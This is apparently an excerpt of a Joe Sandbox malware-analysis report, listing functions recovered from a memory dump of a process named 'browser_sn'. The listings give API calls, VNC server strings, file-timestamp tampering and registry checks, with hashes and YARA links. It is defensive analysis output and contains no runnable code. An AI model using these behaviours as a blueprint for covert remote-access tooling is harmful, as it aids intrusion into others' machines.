Instruction Fuzzy Hash: 67A10F61E2974249FA30BB31A9222B9EA96AF42B94FC48534DF1D477C5DF3CF4418322

Function 00007FF790C5B510 Relevance: 16.7, APIs: 11, Instructions: 172filetimeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00007FF790C5B58C
SetEndOfFile.KERNEL32 ref: 00007FF790C5B5BC
FlushFileBuffers.KERNEL32 ref: 00007FF790C5B5C9
SystemTimeToFileTime.KERNEL32 ref: 00007FF790C5B645
SetFileTime.KERNEL32 ref: 00007FF790C5B65E
CloseHandle.KERNEL32 ref: 00007FF790C5B671
DeleteFileA.KERNEL32 ref: 00007FF790C5B6C2
GetFileAttributesA.KERNEL32 ref: 00007FF790C5B727
SetFileAttributesA.KERNEL32 ref: 00007FF790C5B741
MoveFileExA.KERNEL32 ref: 00007FF790C5B753
SetFileAttributesA.KERNEL32 ref: 00007FF790C5B76B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: File$AttributesTime$BuffersCloseCountDeleteFlushHandleMoveSystemTick
String ID:
API String ID: 2697342021-0
Opcode ID: 922aba798d6da5cdc0d9f7ea4c2bad0652777394967dab14ec6927544dc35b0e
Instruction ID: 9771dbedd5a483a125201826473d844b893f23d75cf4e117da5adfd5e92cb3b8
Opcode Fuzzy Hash: 922aba798d6da5cdc0d9f7ea4c2bad0652777394967dab14ec6927544dc35b0e
Instruction Fuzzy Hash: 37818F26A28A8194EB20EF7094543FC67A1FF85BA8F840235DE2D1B7D5CF38E549C324

Function 00007FF790CF8A7C Relevance: 16.6, APIs: 11, Instructions: 83COMMON

Download Yara Rule

APIs

GetFullPathNameA.KERNEL32 ref: 00007FF790CF8ABB
GetLastError.KERNEL32 ref: 00007FF790CF8AC5
_errno.LIBCMT ref: 00007FF790CF8AEB
calloc.LIBCMT ref: 00007FF790CF8B00
_errno.LIBCMT ref: 00007FF790CF8B0D
_errno.LIBCMT ref: 00007FF790CF8B1F
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CF8B2A
GetFullPathNameA.KERNEL32 ref: 00007FF790CF8B41
free.LIBCMT ref: 00007FF790CF8B56
_errno.LIBCMT ref: 00007FF790CF8B5B
free.LIBCMT ref: 00007FF790CF8B7B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _errno$FullNamePathfree$ErrorLast_invalid_parameter_noinfocalloc
String ID:
API String ID: 3219262609-0
Opcode ID: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
Instruction ID: 61cdb901e1ea66072469d80ffa65bc0e384efa644420c23998b3a449b9b89d83
Opcode Fuzzy Hash: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
Instruction Fuzzy Hash: C431B452E2C60289FA717B715A223F9E190AF43BD0FD84431EB5E577C6DE2CF8059222

Function 00007FF790C5D930 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF790C5D95E

Part of subcall function 00007FF790CC79A0: EnterCriticalSection.KERNEL32 ref: 00007FF790CC79C7
Part of subcall function 00007FF790CC79A0: LeaveCriticalSection.KERNEL32 ref: 00007FF790CC79E9
Part of subcall function 00007FF790CC79A0: CreateSemaphoreA.KERNEL32 ref: 00007FF790CC7A03
Part of subcall function 00007FF790CC79A0: GetLastError.KERNEL32 ref: 00007FF790CC7A15

Part of subcall function 00007FF790C3D9D0: OpenFileMappingA.KERNEL32 ref: 00007FF790C3DA07
Part of subcall function 00007FF790C3D9D0: MapViewOfFile.KERNEL32 ref: 00007FF790C3DA2D

InitializeCriticalSection.KERNEL32 ref: 00007FF790C5D9EB

Part of subcall function 00007FF790C34680: InitializeCriticalSection.KERNEL32 ref: 00007FF790C346A0
Part of subcall function 00007FF790C34680: GetModuleHandleA.KERNEL32 ref: 00007FF790C346C5
Part of subcall function 00007FF790C34680: GetProcAddress.KERNEL32 ref: 00007FF790C346DA
Part of subcall function 00007FF790C34680: GetModuleHandleA.KERNEL32 ref: 00007FF790C346F2
Part of subcall function 00007FF790C34680: GetProcAddress.KERNEL32 ref: 00007FF790C34707
Part of subcall function 00007FF790C34680: GetTickCount.KERNEL32 ref: 00007FF790C3475E

LoadLibraryA.KERNEL32 ref: 00007FF790C5DA0D
GetProcAddress.KERNEL32 ref: 00007FF790C5DA30
LoadLibraryA.KERNEL32 ref: 00007FF790C5DA51
GetProcAddress.KERNEL32 ref: 00007FF790C5DA6D

Strings

user32.dll, xrefs: 00007FF790C5DA06, 00007FF790C5DA4A
ChangeWindowMessageFilter, xrefs: 00007FF790C5DA63
GetCursorInfo, xrefs: 00007FF790C5DA26

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$AddressProc$Initialize$FileHandleLibraryLoadModule$CountCreateEnterErrorLastLeaveMappingOpenSemaphoreTickView
String ID: ChangeWindowMessageFilter$GetCursorInfo$user32.dll
API String ID: 173432231-678763868
Opcode ID: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
Instruction ID: 596df914a59d52822585e53ec32e58acc9d5ce5ad0e0ef8d7b62012d8915ed20
Opcode Fuzzy Hash: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
Instruction Fuzzy Hash: 1841E832629B81A6E658EF34E9402E9B3B8FB85754F905135D6AD037A0DFB8F4B5C310

Function 00007FF790C36A20 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF790C36A65
RegQueryValueExA.ADVAPI32 ref: 00007FF790C36AA1
RegCloseKey.ADVAPI32 ref: 00007FF790C36B6A

Strings

SERVERNT, xrefs: 00007FF790C36B01
System\CurrentControlSet\Control\ProductOptions, xrefs: 00007FF790C36A49
LANSECNT, xrefs: 00007FF790C36AC8, 00007FF790C36B22
WinNT, xrefs: 00007FF790C36B4A
ProductType, xrefs: 00007FF790C36A7D
LANMANNT, xrefs: 00007FF790C36AAF

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: LANMANNT$LANSECNT$ProductType$SERVERNT$System\CurrentControlSet\Control\ProductOptions$WinNT
API String ID: 3677997916-356703426
Opcode ID: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
Instruction ID: d5ce1880080bc17b4df61f31de471f5a181057efdd8d6b603e55390c622bf9aa
Opcode Fuzzy Hash: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
Instruction Fuzzy Hash: 3A412C32A3864382EB74AB30E4453EAF6A0FF45B48F845131EA4D86759EF2CE515DB24

Function 00007FF790C63170 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 48threadsynchronizationwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageA.USER32 ref: 00007FF790C631B6
WaitForSingleObject.KERNEL32 ref: 00007FF790C631C8
TerminateThread.KERNEL32 ref: 00007FF790C631F3
CloseHandle.KERNEL32 ref: 00007FF790C63200
CloseHandle.KERNEL32 ref: 00007FF790C63230

Strings

vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed , xrefs: 00007FF790C6321D
vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close , xrefs: 00007FF790C6319A
vncdesktopsink.cpp : initwindowthread already closed , xrefs: 00007FF790C63246
vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked , xrefs: 00007FF790C631DE

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CloseHandleThread$MessageObjectPostSingleTerminateWait
String ID: vncdesktopsink.cpp : initwindowthread already closed $vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed $vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked $vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close
API String ID: 803186428-2751095142
Opcode ID: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
Instruction ID: d0b0260b6444e2775186e416754b1462d6944c591cbb28683b20e90924e7de67
Opcode Fuzzy Hash: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
Instruction Fuzzy Hash: F8214A6293858286E324AF35D4546F5A36AFF89B14FC86431DA0E1A365CF3CF485C760

Function 00007FF790CF59D8 Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF790CF5D15), ref: 00007FF790CF5A72
malloc.LIBCMT ref: 00007FF790CF5ADB
MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF790CF5D15), ref: 00007FF790CF5B0F
LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF790CF5D15), ref: 00007FF790CF5B36
LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF790CF5D15), ref: 00007FF790CF5B7E
malloc.LIBCMT ref: 00007FF790CF5BDB

Part of subcall function 00007FF790CE8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF790CE8C64
Part of subcall function 00007FF790CE8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF790CF329C,?,?,?,00007FF790CF7749,?,?,?,00007FF790CF77F3), ref: 00007FF790CE8C89
Part of subcall function 00007FF790CE8C34: _callnewh.LIBCMT ref: 00007FF790CE8CA2
Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CAD
Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CB8

LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF790CF5D15), ref: 00007FF790CF5C10
WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF790CF5D15), ref: 00007FF790CF5C50
free.LIBCMT ref: 00007FF790CF5C64
free.LIBCMT ref: 00007FF790CF5C75

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
String ID:
API String ID: 1080698880-0
Opcode ID: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
Instruction ID: b3b89546584301aab60605ba7965e0436d2172cf8fbf39a3e52b84a1c4dacbf6
Opcode Fuzzy Hash: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
Instruction Fuzzy Hash: C881B132A287428AEB30AF3594511A9B6E5FF4A7A4F944235DB1D837D4DF3CF5018721

Function 00007FF790C56CAA Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 256COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF790C5407F
CloseDesktop.USER32 ref: 00007FF790C540C2
LeaveCriticalSection.KERNEL32 ref: 00007FF790C57BAC

Part of subcall function 00007FF790C5B510: GetTickCount.KERNEL32 ref: 00007FF790C5B58C
Part of subcall function 00007FF790C5B510: SetEndOfFile.KERNEL32 ref: 00007FF790C5B5BC
Part of subcall function 00007FF790C5B510: FlushFileBuffers.KERNEL32 ref: 00007FF790C5B5C9
Part of subcall function 00007FF790C5B510: SystemTimeToFileTime.KERNEL32 ref: 00007FF790C5B645
Part of subcall function 00007FF790C5B510: SetFileTime.KERNEL32 ref: 00007FF790C5B65E
Part of subcall function 00007FF790C5B510: CloseHandle.KERNEL32 ref: 00007FF790C5B671
Part of subcall function 00007FF790C5B510: DeleteFileA.KERNEL32 ref: 00007FF790C5B6C2

Strings

vncclient.cpp : vncClientThread , xrefs: 00007FF790C54029
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C54060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C5409A
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C5404B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 744660428-3977938048
Opcode ID: fed645862cd38dbadc558167132c5494320c5b0844e94726f2647533ca8cab21
Instruction ID: c6da242f153bbdf3fbb0d0446a0f0f492015490c31f727febcc27585d0403273
Opcode Fuzzy Hash: fed645862cd38dbadc558167132c5494320c5b0844e94726f2647533ca8cab21
Instruction Fuzzy Hash: 59D18126A1C6C185E760AB35C4587FEABA1EF86B88F994131DA4C077E5CF39F485C720

Function 00007FF790C569D5 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 224COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF790C5407F
CloseDesktop.USER32 ref: 00007FF790C540C2
GetTickCount.KERNEL32 ref: 00007FF790C541B3

Part of subcall function 00007FF790C5C4E0: timeGetTime.WINMM ref: 00007FF790C5C52A
Part of subcall function 00007FF790C5C4E0: EnterCriticalSection.KERNEL32 ref: 00007FF790C5C551
Part of subcall function 00007FF790C5C4E0: RevertToSelf.ADVAPI32 ref: 00007FF790C5C56C
Part of subcall function 00007FF790C5C4E0: LeaveCriticalSection.KERNEL32 ref: 00007FF790C5C57C

LeaveCriticalSection.KERNEL32 ref: 00007FF790C57BAC

Strings

vncclient.cpp : vncClientThread , xrefs: 00007FF790C54029
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C54060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C5409A
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C5404B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$DesktopLeave$CloseCountEnterInputOpenRevertSelfTickTimetime
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 2523754900-3977938048
Opcode ID: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
Instruction ID: 0638a877e2cacd259d35d38a0460973a9a39603d95a3ef8aa7b6ae40b8297eb1
Opcode Fuzzy Hash: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
Instruction Fuzzy Hash: 5EB1B126A2C69185E760EB35C4587FEABA1EF86B88F954131DA4C477A5CF3CF481C720

Function 00007FF790C56C6A Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 213COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF790C5407F
CloseDesktop.USER32 ref: 00007FF790C540C2
LeaveCriticalSection.KERNEL32 ref: 00007FF790C57BAC

Part of subcall function 00007FF790C5B510: GetTickCount.KERNEL32 ref: 00007FF790C5B58C
Part of subcall function 00007FF790C5B510: SetEndOfFile.KERNEL32 ref: 00007FF790C5B5BC
Part of subcall function 00007FF790C5B510: FlushFileBuffers.KERNEL32 ref: 00007FF790C5B5C9
Part of subcall function 00007FF790C5B510: SystemTimeToFileTime.KERNEL32 ref: 00007FF790C5B645
Part of subcall function 00007FF790C5B510: SetFileTime.KERNEL32 ref: 00007FF790C5B65E
Part of subcall function 00007FF790C5B510: CloseHandle.KERNEL32 ref: 00007FF790C5B671
Part of subcall function 00007FF790C5B510: DeleteFileA.KERNEL32 ref: 00007FF790C5B6C2

Strings

vncclient.cpp : vncClientThread , xrefs: 00007FF790C54029
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C54060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C5409A
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C5404B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 744660428-3977938048
Opcode ID: f694d75a88e5963e6137a3996feb78d47f16a8ecee7cd7818c657bba8c0c73e0
Instruction ID: b503c5443cad5b61206077e929d8b5c444b2b853c8848f52cb9c5f8a74d71947
Opcode Fuzzy Hash: f694d75a88e5963e6137a3996feb78d47f16a8ecee7cd7818c657bba8c0c73e0
Instruction Fuzzy Hash: 16B1B126A2C69185E760EB35C4587FEABA1EF86B48F994131DA4C077A5CF3CF485C720

Function 00007FF790C65AE0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

GetClassNameA.USER32 ref: 00007FF790C65B63
GetWindowRect.USER32 ref: 00007FF790C65BA3
CreateRectRgn.GDI32 ref: 00007FF790C65C46
CombineRgn.GDI32 ref: 00007FF790C65C5F
DeleteObject.GDI32 ref: 00007FF790C65C68
free.LIBCMT ref: 00007FF790C65C71

Strings

tty, xrefs: 00007FF790C65B72
ConsoleWindowClass, xrefs: 00007FF790C65B87

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

